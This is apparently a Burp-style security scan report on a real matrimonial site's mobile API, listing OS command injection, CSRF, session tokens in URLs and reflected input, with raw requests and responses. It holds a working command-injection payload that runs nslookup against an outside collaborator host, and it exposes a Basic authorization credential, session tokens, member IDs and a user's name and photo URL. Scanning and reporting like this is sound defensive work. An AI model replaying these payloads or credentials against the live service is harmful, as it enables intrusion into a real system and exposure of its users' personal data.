BM Scan Report
BM Scan Report
Summary
The table below shows the numbers of issues identified in different categories. Issues are classified according to severity as
High, Medium, Low or Information. This reflects the likely impact of each issue for a typical organization. Issues are also
classified according to confidence as Certain, Firm or Tentative. This reflects the inherent reliability of the technique that
was used to identify the issue.
Confidence
Certain Firm Tentative Total
High 1 0 0 1
Medium 0 6 5 11
Severity
Low 1 0 0 1
Information 43 0 0 43
The chart below shows the aggregated numbers of issues identified in each category. Solid coloured bars represent
issues with a confidence level of Certain, and the bars fade as the confidence level falls.
Contents
1. OS command injection
2. Cross-site request forgery
2.1. https://apps.bharatmatrimony.com/appdynamicarray/appgetarrayversion.php
2.2. https://apps.bharatmatrimony.com/applogin/appgetcountryip.php
2.3. https://apps.bharatmatrimony.com/applogin/loginwithdet.php
2.4. https://apps.bharatmatrimony.com/applogin/logout.php
2.5. https://apps.bharatmatrimony.com/appsearch/appcurltrack.php
3. Session token in URL
3.1. https://apps.bharatmatrimony.com/appei/appspromos.php
3.2. https://apps.bharatmatrimony.com/appei/appspromos.php
3.3. https://apps.bharatmatrimony.com/appei/appspromos.php
3.4. https://apps.bharatmatrimony.com/appei/appspromos.php
3.5. https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php
3.6. https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php
4. Strict transport security not enforced
5. Input returned in response (reflected)
5.1. https://apps.bharatmatrimony.com/apicommhistory/communicationhistory.php [URL path filename]
5.2. https://apps.bharatmatrimony.com/apicommhistory/communicationhistory.php [name of an arbitrarily supplied URL parameter]
5.3. https://apps.bharatmatrimony.com/appassuredcontact/getphoneprivacy.php [URL path filename]
5.4. https://apps.bharatmatrimony.com/appassuredcontact/getphoneprivacy.php [name of an arbitrarily supplied URL parameter]
5.5. https://apps.bharatmatrimony.com/appdaily6/yettobeviewed.php [URL path filename]
5.6. https://apps.bharatmatrimony.com/appdaily6/yettobeviewed.php [name of an arbitrarily supplied URL parameter]
5.7. https://apps.bharatmatrimony.com/appdynamicarray/appdynamicpopulate.php [URL path filename]
5.8. https://apps.bharatmatrimony.com/appdynamicarray/appdynamicpopulate.php [name of an arbitrarily supplied URL parameter]
5.9. https://apps.bharatmatrimony.com/appdynamicarray/appgetarrayversion.php [URL path filename]
5.10. https://apps.bharatmatrimony.com/appdynamicarray/appgetarrayversion.php [name of an arbitrarily supplied URL parameter]
5.11. https://apps.bharatmatrimony.com/appeditprofile/appeditprofile.php [URL path filename]
5.12. https://apps.bharatmatrimony.com/appeditprofile/appeditprofile.php [name of an arbitrarily supplied URL parameter]
5.13. https://apps.bharatmatrimony.com/appeditprofile/appownprofile.php [URL path filename]
5.14. https://apps.bharatmatrimony.com/appeditprofile/appownprofile.php [name of an arbitrarily supplied URL parameter]
5.15. https://apps.bharatmatrimony.com/appei/appspromos.php [URL path filename]
5.16. https://apps.bharatmatrimony.com/appei/appspromos.php [name of an arbitrarily supplied URL parameter]
5.17. https://apps.bharatmatrimony.com/applogin/appgetcountryip.php [URL path filename]
5.18. https://apps.bharatmatrimony.com/applogin/appgetcountryip.php [name of an arbitrarily supplied URL parameter]
5.19. https://apps.bharatmatrimony.com/applogin/getDeviceInfo.php [URL path filename]
5.20. https://apps.bharatmatrimony.com/applogin/getDeviceInfo.php [name of an arbitrarily supplied URL parameter]
5.21. https://apps.bharatmatrimony.com/applogin/loginwithdet.php [URL path filename]
5.22. https://apps.bharatmatrimony.com/applogin/loginwithdet.php [name of an arbitrarily supplied URL parameter]
5.23. https://apps.bharatmatrimony.com/applogin/logout.php [URL path filename]
5.24. https://apps.bharatmatrimony.com/applogin/logout.php [name of an arbitrarily supplied URL parameter]
5.25. https://apps.bharatmatrimony.com/appmemberhome/memstats.php [URL path filename]
5.26. https://apps.bharatmatrimony.com/appmemberhome/memstats.php [name of an arbitrarily supplied URL parameter]
5.27. https://apps.bharatmatrimony.com/appphoto/enlargephoto.php [URL path filename]
5.28. https://apps.bharatmatrimony.com/appphoto/enlargephoto.php [name of an arbitrarily supplied URL parameter]
5.29. https://apps.bharatmatrimony.com/appphoto/enlargephotodisplay.php [URL path filename]
5.30. https://apps.bharatmatrimony.com/appphoto/enlargephotodisplay.php [name of an arbitrarily supplied URL parameter]
5.31. https://apps.bharatmatrimony.com/appsearch/appcurltrack.php [URL path filename]
5.32. https://apps.bharatmatrimony.com/appsearch/appcurltrack.php [name of an arbitrarily supplied URL parameter]
5.33. https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php [URL path filename]
5.34. https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php [name of an arbitrarily supplied URL parameter]
5.35. https://apps.bharatmatrimony.com/appsuccess/successstory.php [URL path filename]
5.36. https://apps.bharatmatrimony.com/appsuccess/successstory.php [name of an arbitrarily supplied URL parameter]
5.37. https://apps.bharatmatrimony.com/appunified/appinboxui.php [URL path filename]
5.38. https://apps.bharatmatrimony.com/appunified/appinboxui.php [name of an arbitrarily supplied URL parameter]
5.39. https://apps.bharatmatrimony.com/appunified/viewcalldetails.php [URL path filename]
5.40. https://apps.bharatmatrimony.com/appunified/viewcalldetails.php [name of an arbitrarily supplied URL parameter]
6. Email addresses disclosed
6.1. https://apps.bharatmatrimony.com/applogin/loginwithdet.php
6.2. https://apps.bharatmatrimony.com/appmemberhome/memstats.php
7. SSL certificate
1. OS command injection
Next
Summary
Severity: High
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /applogin/loginwithdet.php
Issue detail
The APPTYPE parameter appears to be vulnerable to OS command injection attacks. It is possible to use various shell
metacharacters to inject arbitrary OS commands. The command output does not appear to be returned in the application's
responses. However, it is possible to cause the application to interact with an external domain, to verify that a command was
executed.
Issue background
Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a
command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use
shell metacharacters to modify the command that is executed, and inject arbitrary further commands that will be executed
by the server.
OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the
application, or of the application's own data and functionality. It may also be possible to use the server as a platform for
attacks against other systems. The exact potential for exploitation depends upon the security context in which the
command is executed, and the privileges that this context has regarding sensitive resources on the server.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost
every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to
perform additional commands than the one intended.
If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers
of defense should be used to prevent attacks:
· The user data should be strictly validated. Ideally, a whitelist of specific accepted values should be used.
Otherwise, only short alphanumeric strings should be accepted. Input containing any other data, including any
conceivable shell metacharacter or whitespace, should be rejected.
· The application should use command APIs that launch a specific process via its name and command-line
parameters, rather than passing a command string to a shell interpreter that supports command chaining and
redirection. For example, the Java API Runtime.exec and the ASP.NET API Process.Start do not support shell
metacharacters. This defense can mitigate the impact of an attack even in the event that an attacker
circumvents the input validation defenses.
Vulnerability classifications
· CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
· CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
· CWE-116: Improper Encoding or Escaping of Output
Request
POST /applogin/loginwithdet.php HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 611
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101%26nslookup%20-q%3dcname%207ckkyriz6bb2uav470vckw622t8uwpkh77vw.burpcollaborator.net.%26'%5c
%22%600%26nslookup%20-q%3dcname%207ckkyriz6bb2uav470vckw622t8uwpkh77vw.burpcollaborator.net.
%26%60'&APPVERSION=4.6&APPVERSIONCODE=192&CN=IN&DEVICEDET=%7B%22DEVICE%22%3A%22iPhone%206S%22%2C
%22SERIAL%22%3A%22%22%2C%22LINE_NUMBER%22%3A%22%22%2C%22SIM_OP_NAME%22%3A%22AirTel%22%2C
%22ISO_COUNTRY_CODE%22%
...[SNIP]...
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 6235
Content-Type: application/json
Date: Tue, 19 May 2020 17:26:20 GMT
Connection: close
Vary: Accept-Encoding
{"RESPONSECODE":"1","ERRCODE":"0","TOTALIDS":"1","SYSTEMDATE":"2020-05-19 22:56:19","MEMBERSTATSPHOTO":
{"PHOTOAVAILABLE":"Y","PHOTOPROTECTED":"N"},"PROFILEIDS":{"PROFILEID":[{"MATRIID":"M6651646","S
...[SNIP]...
The lookup was received from IP address 115.112.200.200 at 2020-May-19 17:26:19 UTC.
· /appdynamicarray/appgetarrayversion.php
· /applogin/appgetcountryip.php
· /applogin/loginwithdet.php
· /applogin/logout.php
· /appsearch/appcurltrack.php
Issue background
Cross-site request forgery (CSRF) vulnerabilities may arise when applications rely solely on HTTP cookies to identify the user
that has issued a particular request. Because browsers automatically add cookies to requests regardless of their origin, it
may be possible for an attacker to create a malicious web site that forges a cross-domain request to the vulnerable
application. For a request to be vulnerable to CSRF, the following conditions must hold:
· The request can be issued cross-domain, for example using an HTML form. If the request contains non-
standard headers or body content, then it may only be issuable from a page that originated on the same
domain.
· The application relies solely on HTTP cookies or Basic Authentication to identify the user that issued the
request. If the application places session-related tokens elsewhere within the request, then it may not be
vulnerable.
· The request performs some privileged action within the application, which modifies the application's state
based on the identity of the issuing user.
· The attacker can determine all the parameters required to construct a request that performs the action. If the
request contains any values that the attacker cannot determine or predict, then it is not vulnerable.
Issue remediation
The most effective way to protect against CSRF vulnerabilities is to include within relevant requests an additional token
that is not transmitted in a cookie: for example, a parameter in a hidden form field. This additional token should contain
sufficient entropy, and be generated using a cryptographic random number generator, such that it is not feasible for an
attacker to determine or predict the value of any token that was issued to another user. The token should be associated
with the user's session, and the application should validate that the correct token is received before performing any action
resulting from the request.
An alternative approach, which may be easier to implement, is to validate that Host and Referrer headers in relevant
requests are both present and contain the same domain name. However, this approach is somewhat less robust:
historically, quirks in browsers and plugins have often enabled attackers to forge cross-domain requests that manipulate
these headers to bypass such defences.
References
· Using Burp to Test for Cross-Site Request Forgery
· The Deputies Are Still Confused
Vulnerability classifications
· CWE-352: Cross-Site Request Forgery (CSRF)
2.1. https://apps.bharatmatrimony.com/appdynamicarray/appgetarrayversion.php
Next
Summary
Severity: Medium
Confidence: Tentative
Host: https://apps.bharatmatrimony.com
Path: /appdynamicarray/appgetarrayversion.php
Issue detail
The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against authenticated users.
The original request contains parameters that look like they may be anti-CSRF tokens. However the request is
successful if these parameters are removed.
Request
POST /appdynamicarray/appgetarrayversion.php HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 102
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=5fbe33bcdfa07a4ad90bd52308ace7fb1&ID=&OUTPUTTYPE=2
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 150
Content-Type: application/json
Date: Tue, 19 May 2020 15:46:17 GMT
Connection: close
Vary: Accept-Encoding
{"RESPONSECODE":"1","ERRCODE":"0","VERSIONDET":
{"RELIGIONLIST":"1","MOTHERTONGUELIST":"1","CASTELIST":"1","ALTERNATECASTELIST":"1","COUNTRYLIST":"1"}}
2.2. https://apps.bharatmatrimony.com/applogin/appgetcountryip.php
Previous Next
Summary
Severity: Medium
Confidence: Tentative
Host: https://apps.bharatmatrimony.com
Path: /applogin/appgetcountryip.php
Issue detail
The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against authenticated users.
Request
POST /applogin/appgetcountryip.php HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 72
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&OUTPUTTYPE=2&SDBMATRID=104
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 55
Content-Type: application/json
Date: Tue, 19 May 2020 15:46:17 GMT
Connection: close
{"RESPONSECODE":"1","ERRCODE":"0","IPCOUNTRYCODE":"IN"}
2.3. https://apps.bharatmatrimony.com/applogin/loginwithdet.php
Previous Next
Summary
Severity: Medium
Confidence: Tentative
Host: https://apps.bharatmatrimony.com
Path: /applogin/loginwithdet.php
Issue detail
The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against authenticated users.
The original request contains parameters that look like they may be anti-CSRF tokens. However the request is
successful if these parameters are removed.
Request
POST /applogin/loginwithdet.php HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 611
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&CN=IN&DEVICEDET=%7B%22DEVICE%22%3A%22iPhone%206S%22%2C
%22SERIAL%22%3A%22%22%2C%22LINE_NUMBER%22%3A%22%22%2C%22SIM_OP_NAME%22%3A%22AirTel%22%2C
%22ISO_COUNT
...[SNIP]...
22%2C%22OP_NAME%22%3A%22%22%2C%22MANUFACTURER%22%3A%22Apple
%22%7D&FRMLOGIN=1&ID=KSWDmXnCsyLfYL2smrF49Q%3D
%3D&NOTIFIYDET=1~1~1~1~1~1~1&OUTPUTTYPE=2&PASSWORD=7N8eX6EhU48C5dU7s1TIIA%3D
%3D&REFINESEARCH=1®ISTERID=34732bb190ef99c64953069b41ef8ba025236e27b164b3b17454fe26618a2ce5&SEARCHRANDO
MPROMO=1<ype=1
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 6278
Content-Type: application/json
Date: Tue, 19 May 2020 15:46:21 GMT
Connection: close
Vary: Accept-Encoding
{"RESPONSECODE":"1","ERRCODE":"0","TOTALIDS":"1","SYSTEMDATE":"2020-05-19 21:16:20","MEMBERSTATSPHOTO":
{"PHOTOAVAILABLE":"Y","PHOTOPROTECTED":"N"},"PROFILEIDS":{"PROFILEID":[{"MATRIID":"M6651646","S
...[SNIP]...
2.4. https://apps.bharatmatrimony.com/applogin/logout.php
Previous Next
Summary
Severity: Medium
Confidence: Tentative
Host: https://apps.bharatmatrimony.com
Path: /applogin/logout.php
Issue detail
The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against authenticated users.
The original request contains parameters that look like they may be anti-CSRF tokens. However, the request is
successful if these parameters are removed.
Request
POST /applogin/logout.php HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 159
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=c172431a4936377805ed7b9fdee61cd53&ID=M6651646&OUTPUT
TYPE=2&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 36
Content-Type: application/json
Date: Tue, 19 May 2020 15:46:20 GMT
Connection: close
{"RESPONSECODE":"1","ERRCODE":"0"}
2.5. https://apps.bharatmatrimony.com/appsearch/appcurltrack.php
Previous Next
Summary
Severity: Medium
Confidence: Tentative
Host: https://apps.bharatmatrimony.com
Path: /appsearch/appcurltrack.php
Issue detail
The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against authenticated
users.
Request
POST /appsearch/appcurltrack.php HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 51
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=®data=
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Date: Tue, 19 May 2020 16:15:04 GMT
Connection: close
3. Session token in URL
Previous Next
· /appei/appspromos.php
· /appei/appspromos.php
· /appei/appspromos.php
· /appei/appspromos.php
· /appsearch/appwhoviewedprofile.php
· /appsearch/appwhoviewedprofile.php
Issue background
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any
forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or
emailed around by users. They may be disclosed to third parties via the Referrer header when any off-site links are
followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
Applications should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in
forms that are submitted using the POST method.
Vulnerability classifications
· CWE-200: Information Exposure
· CWE-384: Session Fixation
· CWE-598: Information Exposure Through Query Strings in GET Request
3.1. https://apps.bharatmatrimony.com/appei/appspromos.php
Summary
Severity: Medium
Confidence: Firm
Host: https://apps.bharatmatrimony.com
Path: /appei/appspromos.php
Issue detail
The URL in the request appears to contain a session token within the query string:
· https://apps.bharatmatrimony.com/appei/appspromos.php?
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=63e52ffb4625ec622ad67f56
b79d7f2e5&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192
Request
GET /appei/appspromos.php?
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=63e52ffb4625ec622ad67f56b79d7f2e5&
TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192 HTTP/1.1
Host: apps.bharatmatrimony.com
Connection: close
Accept: */*
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 1418
Content-Type: application/json
Date: Tue, 19 May 2020 12:24:11 GMT
Connection: close
Vary: Accept-Encoding
{"RESPONSECODE":"1","ERRORCODE":"0","ALLCOMMCNT":"4","TOTALREC":"1","RECORDLIST":[{"PROFILE":
{"PROFILESTATUS":"0","PHONEVERIFIED":"Y","AGE":"24","HEIGHT":"5 Ft 11 In \/ 180 Cms","EDUCATION":"","OCCU
...[SNIP]...
3.2. https://apps.bharatmatrimony.com/appei/appspromos.php
Previous Next
Summary
Severity: Medium
Confidence: Firm
Host: https://apps.bharatmatrimony.com
Path: /appei/appspromos.php
Issue detail
The URL in the request appears to contain a session token within the query string:
· https://apps.bharatmatrimony.com/appei/appspromos.php?
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=0a66cd1c6ed8276b5bf4eef4
413bc96e1&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192
Request
GET /appei/appspromos.php?
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=0a66cd1c6ed8276b5bf4eef4413bc96e1&
TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192 HTTP/1.1
Host: apps.bharatmatrimony.com
Connection: close
Accept: */*
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 1418
Content-Type: application/json
Date: Tue, 19 May 2020 12:35:59 GMT
Connection: close
Vary: Accept-Encoding
{"RESPONSECODE":"1","ERRORCODE":"0","ALLCOMMCNT":"4","TOTALREC":"1","RECORDLIST":[{"PROFILE":
{"PROFILESTATUS":"0","PHONEVERIFIED":"Y","AGE":"24","HEIGHT":"5 Ft 11 In \/ 180 Cms","EDUCATION":"","OCCU
...[SNIP]...
3.3. https://apps.bharatmatrimony.com/appei/appspromos.php
Previous Next
Summary
Severity: Medium
Confidence: Firm
Host: https://apps.bharatmatrimony.com
Path: /appei/appspromos.php
Issue detail
The URL in the request appears to contain a session token within the query string:
· https://apps.bharatmatrimony.com/appei/appspromos.php?
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=04f8dc1093dd3ec4f2e4c1bd
9393cdaa4&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192
Request
GET /appei/appspromos.php?
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&
TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192 HTTP/1.1
Host: apps.bharatmatrimony.com
Connection: close
Accept: */*
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 1418
Content-Type: application/json
Date: Tue, 19 May 2020 15:37:01 GMT
Connection: close
Vary: Accept-Encoding
{"RESPONSECODE":"1","ERRORCODE":"0","ALLCOMMCNT":"4","TOTALREC":"1","RECORDLIST":[{"PROFILE":
{"PROFILESTATUS":"0","PHONEVERIFIED":"Y","AGE":"24","HEIGHT":"5 Ft 11 In \/ 180 Cms","EDUCATION":"","OCCU
...[SNIP]...
3.4. https://apps.bharatmatrimony.com/appei/appspromos.php
Previous Next
Summary
Severity: Medium
Confidence: Firm
Host: https://apps.bharatmatrimony.com
Path: /appei/appspromos.php
Issue detail
The URL in the request appears to contain a session token within the query string:
· https://apps.bharatmatrimony.com/appei/appspromos.php?
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=1e3edd6071d0eb091e7a257
11511fe2a7&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192
Request
GET /appei/appspromos.php?
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=1e3edd6071d0eb091e7a25711511fe2a7
&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192 HTTP/1.1
Host: apps.bharatmatrimony.com
Connection: close
Accept: */*
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 1418
Content-Type: application/json
Date: Tue, 19 May 2020 15:41:28 GMT
Connection: close
Vary: Accept-Encoding
{"RESPONSECODE":"1","ERRORCODE":"0","ALLCOMMCNT":"4","TOTALREC":"1","RECORDLIST":[{"PROFILE":
{"PROFILESTATUS":"0","PHONEVERIFIED":"Y","AGE":"24","HEIGHT":"5 Ft 11 In \/ 180 Cms","EDUCATION":"","OCCU
...[SNIP]...
3.5. https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php
Previous Next
Summary
Severity: Medium
Confidence: Firm
Host: https://apps.bharatmatrimony.com
Path: /appsearch/appwhoviewedprofile.php
Issue detail
The URL in the request appears to contain a session token within the query string:
· https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php?
SDBMATRIID=M6651646&OUTPUTTYPE=2&APPTYPE=101&APPVERSION=4.6&PIINFO=27~165.10000610352~98~47~3~0
~3~1017~0~0~2~1~2~98~31~0~0~3116~3~2404~3~3~9~1~3~4~1~M~F~1589895554~~~~~~~~1~0~3~1~0~0~3~N~0~1~0
~1~1~3~472~79~https://m-
imgs.matrimonycdn.com/photos/2019/09/30/15/M6651646_IMXiF_4692_TL.jpg~1,12,16,26,23,21&LOGINGEN=M&DEVI
CEDET=&USERTIMEDET=1589902649&DOS=27&Lang=en&LOGINTYPE=F&MID=M6651646&ENCID=82518c062044e155fc
e5b3980c0e28c60&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192&GENDER=M&ST
LIMIT=0&RECCNT=20
Request
GET /appsearch/appwhoviewedprofile.php?
SDBMATRIID=M6651646&OUTPUTTYPE=2&APPTYPE=101&APPVERSION=4.6&PIINFO=27~165.10000610352~98~47~3~0~3~1017~0~
0~2~1~2~98~31~0~0~3116~3~2404~3~3~9~1~3~4~1~M~F~1589895554~~~~~~~~1~0~3~1~0~0~3~N~0~1~0~1~1~3~472~79~https://
m-
imgs.matrimonycdn.com/photos/2019/09/30/15/M6651646_IMXiF_4692_TL.jpg~1,12,16,26,23,21&LOGINGEN=M&DEVICEDET=&US
ERTIMEDET=1589902649&DOS=27&Lang=en&LOGINTYPE=F&MID=M6651646&ENCID=82518c062044e155fce5b3980c0e28c60&TOK
ENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192&GENDER=M&STLIMIT=0&RECCNT=20 HTTP/1.1
Host: apps.bharatmatrimony.com
Connection: close
Accept: */*
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 11969
Content-Type: application/json
Date: Tue, 19 May 2020 15:37:32 GMT
Connection: close
Vary: Accept-Encoding
{"RESPONSECODE":"1","ERRCODE":"0","TOTALRESULTS":"42","MATCHINGCOUNT":"8","REMAININGDAYS":"100","SEARCHRES":
{"PROFILE":[{"PROFILESTATUS":"0","MATRIID":"M6257665","NAME":"Vasutha","AGE":"24","GENDER"
...[SNIP]...
3.6. https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php
Previous Next
Summary
Severity: Medium
Confidence: Firm
Host: https://apps.bharatmatrimony.com
Path: /appsearch/appwhoviewedprofile.php
Issue detail
The URL in the request appears to contain a session token within the query string:
· https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php?
SDBMATRIID=M6651646&OUTPUTTYPE=2&APPTYPE=101&APPVERSION=4.6&PIINFO=27~165.10000610352~98~47~3~0
~3~1017~0~0~2~1~2~98~31~0~0~3116~3~2404~3~3~9~1~3~4~1~M~F~1589895554~~~~~~~~1~0~3~1~0~0~3~N~0~1~0
~1~1~3~472~79~https://m-
imgs.matrimonycdn.com/photos/2019/09/30/15/M6651646_IMXiF_4692_TL.jpg~1,12,16,26,23,21&LOGINGEN=M&DEVI
CEDET=&USERTIMEDET=1589902771&DOS=27&Lang=en&LOGINTYPE=F&MID=M6651646&ENCID=02ff975d1149526a01
c1cfcf7f39321a8&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192&SDBMATRID=M6
651646&STLIMIT=0&RECCNT=20&GENDER=M&INAPPIDS=M6257665,E5321603&CONTACTED=0&VIEWED=0&LOGINGEN
=M&FROMINAPP=1&USERTIMEDET=1589902771&SHORTLISTED=0&LOGINTYPE=F&STLIMIT=0&RECCNT=20
Request
GET /appsearch/appwhoviewedprofile.php?
